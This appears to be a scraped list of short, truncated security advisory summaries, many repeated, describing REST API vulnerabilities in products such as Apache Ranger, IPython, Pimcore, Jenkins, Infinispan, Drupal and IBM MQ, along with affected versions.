GHSA-QQG7-GCXW-GMJ3 Apache Ranger allows users to bypass intended access restrictions via the REST API

The Policy Admin Tool in Apache Ranger before 0.5.1 allows remote authenticated users to bypass intended access restrictions via the REST API...

Apache Ranger allows users to bypass intended access restrictions via the REST API

The Policy Admin Tool in Apache Ranger before 0.5.1 allows remote authenticated users to bypass intended access restrictions via the REST API...

GHSA-7FC2-RM35-2PP7 IPython vulnerable to cross site request forgery (CSRF)

IPython Interactive Python is a command shell. Cross-site request forgery in the REST API is possible in in IPython 2 and 3. Versions 2.4.1 and 3.2.3 contain patches...

IPython vulnerable to cross site request forgery (CSRF)

IPython Interactive Python is a command shell. Cross-site request forgery in the REST API is possible in in IPython 2 and 3. Versions 2.4.1 and 3.2.3 contain patches...

Security Bulletin: IBM Transformation Extender Advanced is Potentially Vulnerable to an XML External Entity (XXE) Injection in its REST API.

Summary IBM 10x framework used by IBM Transformation Extender Advanced REST API is vulnerable to XXE injection. The vulnerability was reported by IBM Financial Transaction Manager for ACH Services for Multi-Platform which also uses the IBM 10x framework. Vulnerability Details CVEID: CVE-2017-1758...

BWASP - BoB Web Application Security Project

The BoB Web Application Security Project BWASP is an open-source, analysis tool to support for Web Vulnerability Manual Analysis hackers. The BWASP tool basically provides predicted information through vulnerability analysis without proceeding with an attack. BWASP supports performing automated...

GHSA-Q4HW-C66H-4XQC Pimcore SQLi Vulnerability

Pimcore before 5.3.0 allows SQL Injection via the REST web service API...

Pimcore SQLi Vulnerability

Pimcore before 5.3.0 allows SQL Injection via the REST web service API...

GHSA-QGJQ-M78X-4GM8 Improper Authentication in Jenkins Blue Ocean Plugin

Blue Ocean allows the creation of GitHub organization folders that are set up to scan a GitHub organization for repositories and branches containing a Jenkinsfile, and create corresponding pipelines in Jenkins. Its SCM content REST API supports the pipeline creation and editing feature in Blue...

GHSA-MVXP-3J62-JQR6 Infinispan Rest API Does Not Enforce Auth Constraints

It was found that the REST API in Infinispan before version 9.0.0 did not properly enforce auth constraints. An attacker could use this vulnerability to read or modify data in the default cache or a known cache name...

Infinispan Rest API Does Not Enforce Auth Constraints

It was found that the REST API in Infinispan before version 9.0.0 did not properly enforce auth constraints. An attacker could use this vulnerability to read or modify data in the default cache or a known cache name...

GHSA-P8G6-5MG7-9R5Q Drupal REST API can bypass comment approval

In Drupal 8 prior to 8.3.7; When using the REST API, users without the correct permission can post comments via REST that are approved even if the user does not have permission to post approved comments. This issue only affects sites that have the RESTful Web Services rest module enabled, the...

Drupal REST API can bypass comment approval

In Drupal 8 prior to 8.3.7; When using the REST API, users without the correct permission can post comments via REST that are approved even if the user does not have permission to post approved comments. This issue only affects sites that have the RESTful Web Services rest module enabled, the...

GHSA-6Q78-6XVR-26FG Jenkins Groovy Plugin sandbox bypass vulnerability

Jenkins Script Security sandbox protection could be circumvented during the script compilation phase by applying AST transforming annotations such as @Grab to source code elements. Both the pipeline validation REST APIs and actual script/pipeline execution are affected. This allowed users with...

ManageEngine Password Manager Pro REST API Restriction Bypass (CVE-2022-29081)

Binary data manageenginepmpcve-2022-29081.nbin...

Security Bulletin: IBM MQ WebConsole and REST API are affected by CVE-2021-39031.

Summary An issue was identified within the IBM WebSphere Application Server Liberty profile that IBM MQ uses to provide web console and REST API functionality. Vulnerability Details CVEID: CVE-2021-39031 DESCRIPTION: IBM WebSphere Application Server - Liberty 17.0.0.3 through 22.0.0.1 could allow...

CVE-2022-1338

The Easily Generate Rest API Url WordPress plugin through 1.0.0 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed...

CVE-2022-1338

The Easily Generate Rest API Url WordPress plugin through 1.0.0 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed...

Authentication flaw

Brocade SANnav before version SANnav 2.2.0 logs the REST API Authentication token in plain text...

CVE-2022-1338 Easily Generate Rest API Url <= 1.0.0 - Admin+ Stored Cross-Site Scripting

The Easily Generate Rest API Url WordPress plugin through 1.0.0 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed...